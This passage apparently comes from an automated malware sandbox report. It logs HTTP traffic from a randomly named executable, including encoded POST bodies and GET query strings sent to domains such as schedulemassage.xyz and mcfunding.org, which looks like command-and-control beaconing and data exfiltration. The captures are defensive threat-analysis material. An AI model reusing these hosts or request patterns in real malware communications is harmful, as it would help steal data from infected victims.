                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 57 2f 41 6d 76 34 61 42 61 33 46 38 65 66 6c 69 32 38 2f 4f 72 41 69 39 66 71 55 79 42 2f 79 4c 65 47 79 58 6d 6a 34 73 51 42 6a 45 4a 54 49 6f 33 2f 52 32 71 47 68 32 76 6a 65 47 65 42 76 49 4e 69 63 4d 66 47 44 66 32 64 51 70 4c 39 72 2b 35 53 69 65 78 43 6f 67 58 6b 4b 50 64 51 77 46 37 4f 56 2f 53 59 54 64 6d 53 42 4d 76 61 43 76 51 56 34 76 6e 76 72 39 62 74 54 42 67 61 34 6f 61 65 39 37 65 2b 66 66 76 76 52 32 51 42 74 51 44 57 55 51 4a 57 55 6a 79 53 43 78 54 79 33 37 70 6c 61 49 77 65 31 6d 63 44 68 77 2b 51 55 55 70 59 49 70 41 71 67 41 58 56 75 67 31 4f 6a 4b 5a 42 33 55 45 4e 6a 33 72 65 4f 47 34 32 31 71 4d 7a 47 74 71 5a 72 67 57 63 4a 78 49 79 79 6e 39 69 2f 6e 4d 4f 46 52 68 4f 59 67 6f 47 6d 6a 59 35 39 41 38 6b 77 52 6d 47 52 51 59 47 74 45 2f 52 4d 30 6c 51 4a 2f 33 34 47 41 30 4c 39 68 41 64 2f 4d 4e 73 38 74 38 6e 68 2f 6e 6e 59 6f 4f 5a 67 4e 6c 79 5a 77 41 47 41 2b 56 75 30 2b 53 6c 4e 4f 52 38 34 77 7a 58 75 34 67 32 [TRUNCATED]
                                                                  Data Ascii: NjHpTfh=8cwN9mJXk9DUW/Amv4aBa3F8efli28/OrAi9fqUyB/yLeGyXmj4sQBjEJTIo3/R2qGh2vjeGeBvINicMfGDf2dQpL9r+5SiexCogXkKPdQwF7OV/SYTdmSBMvaCvQV4vnvr9btTBga4oae97e+ffvvR2QBtQDWUQJWUjySCxTy37plaIwe1mcDhw+QUUpYIpAqgAXVug1OjKZB3UENj3reOG421qMzGtqZrgWcJxIyyn9i/nMOFRhOYgoGmjY59A8kwRmGRQYGtE/RM0lQJ/34GA0L9hAd/MNs8t8nh/nnYoOZgNlyZwAGA+Vu0+SlNOR84wzXu4g2smKw4iPWO103OxaW5SIfIDlJuHWWZQM+4tz7C8LlOXTaOsaUdfXnIqQNJXRcNIYJ4qMpDfgdStx2+2euNzSPMImzS5qG4aEISZYVSP+SWAsvvJTiFJxBDIWxoDKyzRe52CXLNZCmI4nobop6h8RgWYemxE7PLqTTGpQHDDpDXxPjv051hjD4ps3YVnodJmnH+BtkFDOw7mwO25TltmRKi9h0sYs295ljotKIPQfo6KBQVXk7pSgVMkibBSqWnqsXuhOi38nBdjnSPiuy7nEVcc9hgITxRCBKHpP/jC6x21DcHoRRGKQkOEVC0Xy34R/O7HR0lJ09zlJz4cxMPO7CMzYG3eW5sxzPlQVdQGIk8UqaqNnsE6FOKDLsE2ucZuVNhLtoAREDCFxuC69me2/UECnNqdnY4hQ2FnlXWqXJ2aUrcxx0FDJ71jox7uc2mgqJ2Pm/9ECaBjzHeZ3o8gAzAPvW6Fc0djOgTT3l+jpKH6AYnkODTVN6ROL96lFAJYgFAkVQgy4XXP+tno+oAoIQJJQ9CoyTi+SnnukN3X6MEEzw1UHzZaSgVONcopC+fJO+GURkqKLP3me5piG0JDFZ4GYbWTEyVNiyZ9tWf2c037CrGxIs2n6ullkPqIEEhVOphG1sTDDlQPx0/umhBbU0uAVqhsyjq6H4sD [TRUNCATED]
                                                                  Nov 22, 2024 14:45:27.401501894 CET533INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 22 Nov 2024 13:45:27 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.849716203.161.49.193801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:45:28.842729092 CET558OUTGET /hxmz/?NjHpTfh=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70ewIeMOmwh+ftSU1XmKvTSoNxNN/QLOdtg9qtYWOUm1ByQ==&1fo=GF14svyhH44dt HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.futurevision.life
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Nov 22, 2024 14:45:30.073261023 CET548INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 22 Nov 2024 13:45:29 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.8497173.33.130.190801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:45:35.744465113 CET828OUTPOST /slxp/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.schedulemassage.xyz
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.schedulemassage.xyz
                                                                  Referer: http://www.schedulemassage.xyz/slxp/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 67 49 50 2b 59 57 57 6b 71 55 59 61 48 4f 42 5a 33 2b 32 69 6d 51 56 2f 41 4c 35 6d 68 39 36 6f 6e 69 69 34 71 78 52 54 42 36 6f 41 50 56 4b 4b 54 6d 46 69 61 2b 59 4d 53 6c 75 52 35 43 45 63 4e 4e 6d 52 75 4a 5a 46 33 74 6f 4b 6e 61 69 49 77 58 36 71 7a 72 65 59 44 6e 73 4e 72 6d 49 45 62 6d 2b 51 4d 57 65 36 53 5a 6e 5a 6c 35 42 41 62 61 42 71 4a 54 7a 64 31 6e 68 51 6a 65 5a 4f 69 79 55 59 32 61 76 35 4d 2f 38 47 59 79 33 66 6a 35 76 70 57 32 33 55 4c 6a 54 56 44 76 35 42 32 42 31 4c 47 76 68 50 69 4f 35 4c 62 61 6c 34 49 67 31 4a 6e 61 65 4b 4a 70 77 3d
                                                                  Data Ascii: NjHpTfh=dp+M27OzYBUBgIP+YWWkqUYaHOBZ3+2imQV/AL5mh96onii4qxRTB6oAPVKKTmFia+YMSluR5CEcNNmRuJZF3toKnaiIwX6qzreYDnsNrmIEbm+QMWe6SZnZl5BAbaBqJTzd1nhQjeZOiyUY2av5M/8GYy3fj5vpW23ULjTVDv5B2B1LGvhPiO5Lbal4Ig1JnaeKJpw=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.8497183.33.130.190801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:45:38.399326086 CET848OUTPOST /slxp/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.schedulemassage.xyz
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.schedulemassage.xyz
                                                                  Referer: http://www.schedulemassage.xyz/slxp/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 68 70 2f 2b 64 78 43 6b 6a 55 59 46 43 4f 42 5a 39 65 33 72 6d 51 70 2f 41 4b 4e 4d 68 76 65 6f 6e 47 75 34 34 45 74 54 41 36 6f 41 58 46 4c 41 58 6d 46 31 61 2b 55 69 53 68 6d 52 35 43 41 63 4e 4a 69 52 75 36 78 47 74 64 6f 49 75 36 69 4f 39 33 36 71 7a 72 65 59 44 6a 45 72 72 6d 51 45 62 32 75 51 4e 30 6d 35 4e 70 6e 65 69 35 42 41 52 36 42 75 4a 54 7a 6a 31 69 34 59 6a 63 68 4f 69 33 77 59 32 4c 76 2b 44 2f 39 4e 63 79 32 30 6b 34 53 51 53 55 6a 4e 48 42 2f 4f 42 59 5a 4f 7a 33 45 68 63 4e 70 4a 68 4f 52 67 62 5a 4e 4f 4e 58 6f 68 39 35 4f 36 58 2b 6d 41 36 73 2b 35 6e 66 4d 66 63 53 78 32 2f 4d 59 7a 43 33 30 37
                                                                  Data Ascii: NjHpTfh=dp+M27OzYBUBhp/+dxCkjUYFCOBZ9e3rmQp/AKNMhveonGu44EtTA6oAXFLAXmF1a+UiShmR5CAcNJiRu6xGtdoIu6iO936qzreYDjErrmQEb2uQN0m5Npnei5BAR6BuJTzj1i4YjchOi3wY2Lv+D/9Ncy20k4SQSUjNHB/OBYZOz3EhcNpJhORgbZNONXoh95O6X+mA6s+5nfMfcSx2/MYzC307


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.8497193.33.130.190801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:45:41.062104940 CET1865OUTPOST /slxp/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.schedulemassage.xyz
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.schedulemassage.xyz
                                                                  Referer: http://www.schedulemassage.xyz/slxp/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 68 70 2f 2b 64 78 43 6b 6a 55 59 46 43 4f 42 5a 39 65 33 72 6d 51 70 2f 41 4b 4e 4d 68 76 57 6f 6e 7a 79 34 70 58 46 54 44 36 6f 41 4a 56 4c 44 58 6d 45 33 61 2b 4d 75 53 68 69 72 35 45 63 63 4d 71 71 52 6f 4c 78 47 6a 74 6f 49 73 36 69 50 77 58 36 46 7a 72 4f 55 44 6e 67 72 72 6d 51 45 62 77 53 51 62 57 65 35 65 35 6e 5a 6c 35 42 63 62 61 42 47 4a 54 37 73 31 6a 4d 49 69 73 42 4f 6a 58 41 59 77 35 58 2b 63 50 39 50 62 79 32 73 6b 34 65 78 53 58 48 37 48 46 2f 77 42 65 70 4f 78 51 70 4b 44 38 4e 77 2f 73 46 75 55 2b 6b 6b 56 31 38 66 69 50 61 2b 66 73 4b 61 78 59 75 78 75 73 35 56 57 6a 67 62 6a 73 30 69 49 52 56 44 53 6b 38 74 37 54 35 30 4f 66 50 49 74 31 34 50 6a 74 6a 6f 74 59 50 4d 49 74 36 62 75 6a 4b 61 33 42 5a 49 70 2f 34 66 6b 79 38 71 43 6c 76 46 34 50 31 41 34 7a 49 36 46 51 6d 35 63 70 7a 31 39 77 71 57 78 4d 32 45 2f 43 73 49 64 2f 71 6b 46 4d 2f 44 68 76 5a 66 35 49 57 7a 57 76 63 6a 39 68 65 64 69 48 49 4e 74 2b 70 6f 58 33 [TRUNCATED]
                                                                  Data Ascii: NjHpTfh=dp+M27OzYBUBhp/+dxCkjUYFCOBZ9e3rmQp/AKNMhvWonzy4pXFTD6oAJVLDXmE3a+MuShir5EccMqqRoLxGjtoIs6iPwX6FzrOUDngrrmQEbwSQbWe5e5nZl5BcbaBGJT7s1jMIisBOjXAYw5X+cP9Pby2sk4exSXH7HF/wBepOxQpKD8Nw/sFuU+kkV18fiPa+fsKaxYuxus5VWjgbjs0iIRVDSk8t7T50OfPIt14PjtjotYPMIt6bujKa3BZIp/4fky8qClvF4P1A4zI6FQm5cpz19wqWxM2E/CsId/qkFM/DhvZf5IWzWvcj9hediHINt+poX3WACOLOqGctHAY5sRVYevZuf822sC/5mOUXxcG6erqRe2Zj7HSqgwo/0cB6W19v2De98hrEHUla82RbWQP11bqo3PNy/5BIjIO1J/k8dCknd44d405OqJaFHDvbkU/lsYKuMWiTecAStJOPPbFOi7fKBqydXy8ozTLu8bK996jlnT7fhSTaRj6B2HHuaQdCqEuhYbhbb9FJc0XSATw5uWUb8J+q7Rj/3ndFrpi0aGgPjA1oh3ICMrbbTxdpJzsjwscD4ZmjhZvc4ETNM9KKS2FqdZHrBSG+KXq2isfT0RL4smk1o5CAS7kjinyzSrMRMsmjOUFB9yMTRGa5jp6Gh1OcCYnGCO8DzGNeY80mOFOzww1JFo4v2CgiBDzU8+DTHnyhrwWcHpzeeG7fZQEtF1WLdQJKXMUSeLYfIlQ0+N1mbaNWlUiwWcDHZ4zdR4tO8CSrJb2S73/0WcOZrOkycM3wKxUC9orBCBHif/ou8A36K2dw+hC5Mc0xmhJdIsVYZGSsSBwxaelns2bf/6TlIM28qHbEt+TSWMqI/+CeAs6lylIFBh2uUF+mEpHBGyWjXBsMBP/Hasr9mTF7iqxagZjNAuoMCm7Kczbe5/V5AP4mxxfsdouemfoAXMF9xrGab1x8q6WB+CqhHypVxnfpU8F2ZZtwXZh6Sto3 [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.8497203.33.130.190801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:45:43.709770918 CET560OUTGET /slxp/?NjHpTfh=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOs9wYs5314wmawIeBCSIctWMwFCyIHUycaencn4NBaeE5ag==&1fo=GF14svyhH44dt HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.schedulemassage.xyz
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Nov 22, 2024 14:45:44.801428080 CET413INHTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Fri, 22 Nov 2024 13:45:44 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 273
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 6a 48 70 54 66 68 3d 51 72 57 73 31 4d 47 62 59 79 51 46 6f 71 33 70 41 69 61 73 78 51 30 76 4a 59 45 30 7a 2f 76 61 77 54 5a 65 65 49 31 69 38 74 6d 38 6b 78 65 4e 34 6d 52 61 49 5a 51 71 44 6d 53 72 65 31 41 7a 4e 39 73 49 65 47 2b 50 78 51 34 31 45 4c 2b 58 71 6f 6c 4f 73 39 77 59 73 35 33 31 34 77 6d 61 77 49 65 42 43 53 49 63 74 57 4d 77 46 43 79 49 48 55 79 63 61 65 6e 63 6e 34 4e 42 61 65 45 35 61 67 3d 3d 26 31 66 6f 3d 47 46 31 34 73 76 79 68 48 34 34 64 74 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NjHpTfh=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOs9wYs5314wmawIeBCSIctWMwFCyIHUycaencn4NBaeE5ag==&1fo=GF14svyhH44dt"}</script></head></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.8497213.33.130.190801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:45:50.654340029 CET810OUTPOST /0598/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.mcfunding.org
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.mcfunding.org
                                                                  Referer: http://www.mcfunding.org/0598/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 4a 61 35 5a 30 6f 6d 6e 72 43 53 4a 78 65 5a 58 72 43 49 4e 65 6b 76 44 6a 6b 56 6e 35 4c 58 73 4b 58 4f 61 49 54 63 58 44 71 76 66 6a 4a 71 42 71 6e 7a 37 59 4a 4d 65 69 32 41 30 72 53 6f 72 65 46 2f 75 48 62 49 66 64 66 76 69 42 33 4f 54 50 64 64 71 78 31 2f 4a 6b 32 76 5a 46 64 6a 33 6a 67 76 37 45 74 33 52 6d 30 77 71 48 79 77 56 57 6b 70 6a 64 6c 48 42 57 51 72 41 52 51 52 69 77 2f 38 33 4b 6e 78 37 42 32 6e 48 72 34 62 38 31 30 67 76 71 39 46 6c 6d 2b 4f 6a 6f 41 43 53 79 2b 41 4f 75 64 64 6a 79 76 46 61 73 41 2f 36 4d 6b 63 46 56 65 56 5a 2f 51 3d
                                                                  Data Ascii: NjHpTfh=g4UhOENgM8To+Ja5Z0omnrCSJxeZXrCINekvDjkVn5LXsKXOaITcXDqvfjJqBqnz7YJMei2A0rSoreF/uHbIfdfviB3OTPddqx1/Jk2vZFdj3jgv7Et3Rm0wqHywVWkpjdlHBWQrARQRiw/83Knx7B2nHr4b810gvq9Flm+OjoACSy+AOuddjyvFasA/6MkcFVeVZ/Q=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  14192.168.2.8497223.33.130.190801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:45:53.367153883 CET830OUTPOST /0598/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.mcfunding.org
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.mcfunding.org
                                                                  Referer: http://www.mcfunding.org/0598/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 70 71 35 62 56 6f 6d 68 4c 43 56 55 42 65 5a 64 4c 43 45 4e 65 67 76 44 69 78 4b 6b 4b 2f 58 69 49 2f 4f 62 4b 37 63 51 44 71 76 51 44 4a 7a 46 71 6d 65 37 5a 30 6d 65 6a 61 41 30 72 47 6f 72 63 74 2f 70 30 44 4c 5a 4e 66 74 76 68 33 49 51 2f 64 64 71 78 31 2f 4a 67 66 79 5a 46 56 6a 33 54 51 76 35 6c 74 30 63 47 30 33 70 48 79 77 43 47 6b 74 6a 64 6c 78 42 54 78 41 41 54 6f 52 69 78 76 38 33 62 6e 32 77 42 32 68 44 72 34 4c 78 58 6b 77 76 59 49 69 67 41 36 68 6e 49 41 55 58 45 50 71 55 4d 56 62 67 79 48 75 61 76 6f 4a 2f 37 35 30 66 32 4f 6c 48 6f 48 74 50 36 50 72 66 47 74 67 48 68 35 4f 2b 68 4e 54 4f 39 47 4d
                                                                  Data Ascii: NjHpTfh=g4UhOENgM8To+pq5bVomhLCVUBeZdLCENegvDixKkK/XiI/ObK7cQDqvQDJzFqme7Z0mejaA0rGorct/p0DLZNftvh3IQ/ddqx1/JgfyZFVj3TQv5lt0cG03pHywCGktjdlxBTxAAToRixv83bn2wB2hDr4LxXkwvYIigA6hnIAUXEPqUMVbgyHuavoJ/750f2OlHoHtP6PrfGtgHh5O+hNTO9GM


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  15192.168.2.8497233.33.130.190801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:45:56.025079966 CET1847OUTPOST /0598/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.mcfunding.org
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.mcfunding.org
                                                                  Referer: http://www.mcfunding.org/0598/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
